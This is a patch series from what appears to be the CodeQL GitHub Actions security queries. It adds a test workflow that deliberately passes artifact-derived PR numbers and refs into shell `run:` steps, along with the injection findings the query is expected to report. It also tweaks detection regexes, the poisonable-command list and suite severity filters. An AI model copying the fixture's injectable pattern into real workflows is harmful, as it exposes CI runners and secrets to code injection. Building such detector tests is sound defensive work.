+++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -15,6 +15,10 @@ edges | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -48,5 +52,11 @@ nodes | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | subpaths #select 
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml new file mode 100644 index 00000000000..dc101c76944 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml @@ -0,0 +1,56 @@ +name: tests + +on: + workflow_run: + workflows: ["Tests"] + types: + - completed + +permissions: { contents: read } + +jobs: + get-artifacts: + name: Get required artifacts + runs-on: ubuntu-latest + permissions: + actions: read + statuses: write + outputs: + pr_num: ${{ steps.set-ref.outputs.pr_num }} + ref: ${{ steps.set-ref.outputs.ref }} + steps: + - name: Download and extract event file + uses: actions/download-artifact@v4 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + run-id: ${{ github.event.workflow_run.id }} + name: event_file + path: artifacts/event_file + + - name: Try to read PR number + id: set-ref + run: | + pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json) + if [ -z "$pr_num" ] || [ "$pr_num" == "null" ]; then + pr_num="" + fi + + ref=$pr_num + if [ -z "$ref" ] || [ "$ref" == "null" ]; then + ref=${{ github.ref }} + fi + + echo "pr_num=$pr_num" >> $GITHUB_OUTPUT + echo "ref=$ref" >> $GITHUB_OUTPUT + + test2: + name: test2 + runs-on: ubuntu-latest + needs: get-artifacts + permissions: + actions: read + statuses: write + steps: + - run: echo ${{ needs.get-artifacts.outputs.pr_num }} + - run: echo ${{ needs.get-artifacts.outputs.ref }} + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 3f6fd5310c4..69085548f69 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -92,6 +92,15 @@ edges | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | provenance | | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | provenance | | +| .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | provenance | | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | provenance | | +| 
.github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | provenance | | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | 
@@ -320,6 +329,16 @@ nodes | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | semmle.label | Job outputs node [pr_num] | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | semmle.label | Job outputs node [ref] | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | semmle.label | steps.set-ref.outputs.pr_num | +| .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | semmle.label | steps.set-ref.outputs.ref | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | semmle.label | Run Step: set-ref [pr_num] | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | semmle.label | Run Step: set-ref [ref] | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | +| .github/workflows/test11.yml:54:20:54:60 | 
needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | +| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -442,6 +461,8 @@ subpaths | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | +| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index bb58a7395a1..360c33720fb 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -92,6 +92,15 @@ edges | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | provenance | | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | provenance | | +| .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | provenance | | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | provenance | | +| 
.github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | provenance | | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | 
@@ -320,6 +329,16 @@ nodes | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | semmle.label | Job outputs node [pr_num] | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | semmle.label | Job outputs node [ref] | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | semmle.label | steps.set-ref.outputs.pr_num | +| .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | semmle.label | steps.set-ref.outputs.ref | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | semmle.label | Run Step: set-ref [pr_num] | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | semmle.label | Run Step: set-ref [ref] | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | +| .github/workflows/test11.yml:54:20:54:60 | 
needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | +| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 2dffb865d0bc7f2d6ca5d5e9791ec579823633b0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Jul 2024 12:45:34 +0200 Subject: [PATCH 0422/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 75d8cd5d2e0..285ea6e1680 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.22 +version: 0.1.23 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index ce8ab4c24dd..a51e583b32c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.22 +version: 0.1.23 groups: [actions, queries] suites: codeql-suites extractor: javascript From 12e78ac4fe4162920e0418129f90a5b2fc8a35ba Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Jul 2024 23:37:04 +0200 Subject: [PATCH 0423/1267] fix(regex): update pattern to match both gh and hub commands --- ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index be0229a77c4..fba33bb8bc8 100644 
--- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -242,7 +242,7 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GhMutableRefCheckout() { exists(string line | this.getScript().splitAt("\n") = line and - line.regexpMatch(".*gh\\s+pr\\s+checkout.*") and + line.regexpMatch(".*(gh|hub)\\s+pr\\s+checkout.*") and ( (containsHeadRef(line) or containsPullRequestNumber(line)) or From da28f7dc0af47b59f6d0fe29116677e3d1ed3180 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Jul 2024 15:56:47 +0200 Subject: [PATCH 0424/1267] feat(config): add asv to poisonable steps list --- ql/lib/ext/config/poisonable_steps.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 7f07f696445..1e0abb02d44 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -16,6 +16,7 @@ extensions: # source: https://boostsecurityio.github.io/lotp/ data: - ["ant"] + - ["asv"] - ["awk\\s+-f"] - ["bundle"] - ["cargo"] From bb78bb6f570e6b335c0d25b2986a25c2302c0e81 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Jul 2024 18:27:00 +0200 Subject: [PATCH 0425/1267] refactor(queries): update severity level for workflow permissions --- ql/src/Security/CWE-275/MissingActionsPermissions.ql | 2 +- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.ql b/ql/src/Security/CWE-275/MissingActionsPermissions.ql index 9373bf808e3..ffb217739c7 100644 --- a/ql/src/Security/CWE-275/MissingActionsPermissions.ql +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.ql 
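Review bot: The widened pattern `.*(gh|hub)\\s+pr\\s+checkout.*` is still unanchored on the left, so any token that merely ends in `gh` or `hub` and is followed by `pr checkout` matches, and the second alternative adds to those accidental matches. A word boundary keeps the match on the command name: `line.regexpMatch(".*\\b(gh|hub)\\s+pr\\s+checkout\\b.*") and`. The class is still named `GhMutableRefCheckout` although it now also covers `hub`, so a one-line QLDoc on the class saying so would help. The class body and the `exists` continue outside this hunk.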
@@ -3,7 +3,7 @@ * @description Workflows should contain permissions to provide a clear understanding has permissions to run the workflow. * @kind problem * @security-severity 5.0 - * @problem.severity warning + * @problem.severity recommendation * @precision high * @id actions/missing-workflow-permissions * @tags actions diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 58561ca6dba..ecdb1d06526 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -3,7 +3,7 @@ * @description Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. * @kind problem * @security-severity 5.0 - * @problem.severity warning + * @problem.severity recommendation * @precision high * @id actions/unpinned-tag * @tags security From ba6ab04dfca19cb6fbd6447e20ac8ad55b8b9ecb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Jul 2024 18:27:39 +0200 Subject: [PATCH 0426/1267] feat(suite): Remove severity:warning queries from CodeScanning suite --- ql/src/codeql-suites/actions-code-scanning.qls | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/ql/src/codeql-suites/actions-code-scanning.qls b/ql/src/codeql-suites/actions-code-scanning.qls index d0fd74736ce..801b22b0005 100644 --- a/ql/src/codeql-suites/actions-code-scanning.qls +++ b/ql/src/codeql-suites/actions-code-scanning.qls @@ -8,12 +8,17 @@ tags contain: - security - maintainability + problem.severity: + - error + - recommendation - include: kind: - diagnostic - exclude: + problem.severity: + - warning tags contain: - experimental - testing From 28cc06e1361d34a35a1e10ccc89ca97547187fb9 Mon Sep 17 00:00:00 2001 
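Review bot: The `@description` of `actions/missing-workflow-permissions` shown as context in this hunk is not a complete sentence ("to provide a clear understanding has permissions to run the workflow"), and since the metadata is being edited anyway it could become `@description Workflows should set explicit permissions so it is clear which permissions the workflow runs with.` In this hunk and in the `UnpinnedActionsTag.ql` hunk, `@problem.severity` drops to `recommendation` while `@security-severity 5.0` is unchanged, so the two severity fields now tell different stories. If the downgrade exists mainly so that suite filtering can key on `problem.severity`, a sentence in the commit message saying so would help the next reader.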
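Review bot: In `actions-code-scanning.qls` the added `problem.severity: - warning` sits inside the same `exclude` instruction as `tags contain`, and as far as I know the constraints of a single suite instruction are combined with AND. The block would then only drop queries that are warning-level and also carry one of the listed tags, so an error-level query tagged `experimental` would stay in the code-scanning suite. Because the first `include` already limits `problem.severity` to `error` and `recommendation`, the severity filter in `exclude` is redundant; either remove it or move it to its own `- exclude:` instruction so that the tag exclusion keeps working on its own.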
